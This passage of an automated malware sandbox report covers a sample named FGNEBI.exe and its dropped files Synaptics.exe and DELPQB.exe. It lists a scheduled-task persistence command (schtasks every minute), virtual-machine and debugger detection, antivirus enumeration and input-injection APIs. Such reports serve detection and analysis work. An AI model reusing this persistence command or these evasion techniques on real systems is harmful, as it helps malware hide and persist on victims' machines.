                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeWindow / User API: threadDelayed 5126Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeWindow / User API: foregroundWindowGot 1532Jump to behavior
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeAPI coverage: 7.4 %
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeAPI coverage: 3.7 %
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exe TID: 8012Thread sleep time: -51260s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5900Thread sleep time: -840000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 3456Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeThread sleep count: Count: 5126 delay: -10Jump to behavior
                              Source: Yara matchFile source: 00000002.00000002.2669135026.00000000048EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.2657472452.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000007.00000002.2657921440.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: wscript.exe PID: 8180, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\WLJOQW.vbs, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DADD92 GetFileAttributesW,FindFirstFileW,FindClose,2_2_00DADD92
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE2044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DE2044
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,2_2_00DE219F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE24A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DE24A9
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD6B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,2_2_00DD6B3F
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD6E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,2_2_00DD6E4A
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDF350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,2_2_00DDF350
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDFDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,2_2_00DDFDD2
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DDFD47 FindFirstFileW,FindClose,2_2_00DDFD47
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00232044 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_00232044
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0023219F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,10_2_0023219F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_002324A9 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_002324A9
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00226B3F _wcscat,_wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,10_2_00226B3F
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00226E4A _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,10_2_00226E4A
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022F350 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,10_2_0022F350
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022FD47 FindFirstFileW,FindClose,10_2_0022FD47
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_001FDD92 GetFileAttributesW,FindFirstFileW,FindClose,10_2_001FDD92
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_0022FDD2 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,10_2_0022FDD2
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00DAE47B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: Amcache.hve.15.drBinary or memory string: VMware
                              Source: Amcache.hve.15.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.15.drBinary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
                              Source: Amcache.hve.15.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.15.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.15.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.15.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.15.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: ._cache_FGNEBI.exe, 00000002.00000002.2659885388.00000000013E0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.0000000000663000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1610030732.000000000061A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.15.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.15.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.15.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.15.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.15.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.15.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.15.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: ._cache_FGNEBI.exe, 00000002.00000002.2661349834.0000000001448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll.
                              Source: Amcache.hve.15.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.15.drBinary or memory string: VMware20,1
                              Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Generation Counter
                              Source: Amcache.hve.15.drBinary or memory string: NECVMWar VMware SATA CD00
                              Source: Amcache.hve.15.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                              Source: Amcache.hve.15.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                              Source: Amcache.hve.15.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                              Source: Amcache.hve.15.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                              Source: Amcache.hve.15.drBinary or memory string: VMware PCI VMCI Bus Device
                              Source: Amcache.hve.15.drBinary or memory string: VMware VMCI Bus Device
                              Source: Amcache.hve.15.drBinary or memory string: VMware Virtual RAM
                              Source: Amcache.hve.15.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                              Source: Amcache.hve.15.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeAPI call chain: ExitProcess graph end nodegraph_2-107573
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeAPI call chain: ExitProcess graph end nodegraph_2-104596
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeProcess information queried: ProcessInformationJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess queried: DebugPortJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DE703C BlockInput,2_2_00DE703C
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00D9374E
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC46D0 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,2_2_00DC46D0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00EF30B0 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00EF30B0
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DBA937 GetProcessHeap,2_2_00DBA937
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB8E19 SetUnhandledExceptionFilter,2_2_00DB8E19
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB8E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00DB8E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00208E3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_00208E3C
                              Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 10_2_00208E19 SetUnhandledExceptionFilter,10_2_00208E19
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DCBE95 LogonUserW,2_2_00DCBE95
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00D9374E GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,2_2_00D9374E
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD4B52 SendInput,keybd_event,2_2_00DD4B52
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DD7DD5 mouse_event,2_2_00DD7DD5
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess created: C:\Users\user\Desktop\._cache_FGNEBI.exe "C:\Users\user\Desktop\._cache_FGNEBI.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\FGNEBI.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DCB398 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,2_2_00DCB398
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DCBE31 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,2_2_00DCBE31
                              Source: ._cache_FGNEBI.exe, DELPQB.exeBinary or memory string: Shell_TrayWnd
                              Source: ._cache_FGNEBI.exe, 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmp, DELPQB.exe, 0000000A.00000002.1546035160.000000000028E000.00000040.00000001.01000000.00000009.sdmp, DELPQB.exe, 00000010.00000002.1559017213.000000000028E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB7254 cpuid 2_2_00DB7254
                              Source: C:\Users\user\Desktop\FGNEBI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeQueries volume information: C:\ VolumeInformationJump to behavior
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DB40DA GetSystemTimeAsFileTime,__aulldiv,2_2_00DB40DA
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00E0C146 GetUserNameW,2_2_00E0C146
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DC2C3C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_00DC2C3C
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeCode function: 2_2_00DAE47B GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,2_2_00DAE47B
                              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                              Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                              Source: Amcache.hve.15.drBinary or memory string: msmpeng.exe
                              Source: Amcache.hve.15.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                              Source: Amcache.hve.15.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                              Source: ._cache_FGNEBI.exe, 00000002.00000002.2659885388.000000000141A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                              Source: Amcache.hve.15.drBinary or memory string: MsMpEng.exe
                              Source: C:\Users\user\Desktop\._cache_FGNEBI.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct

                              Stealing of Sensitive Information

                              barindex
                              Source: Yara matchFile source: Process Memory Space: ._cache_FGNEBI.exe PID: 8008, type: MEMORYSTR
                              Source: Yara matchFile source: FGNEBI.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.FGNEBI.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: FGNEBI.exe PID: 7916, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: Synaptics.exe PID: 8036, type: MEMORYSTR
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5CF5.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: DELPQB.exe, 0000001E.00000002.2440012891.000000000028E000.00000040.00000001.01000000.00000009.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 10, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytea
                              Source: DELPQB.exe, 00000010.00000002.1570878643.0000000004B64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81
                              Source: DELPQB.exeBinary or memory string: WIN_XP
                              Source: DELPQB.exe, 0000001B.00000002.1861493214.000000000482F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81>
                              Source: DELPQB.exe, 00000019.00000003.1728678565.0000000004D0A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81D~
                              Source: DELPQB.exe, 0000001E.00000003.2418800661.00000000046AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WIN_81h
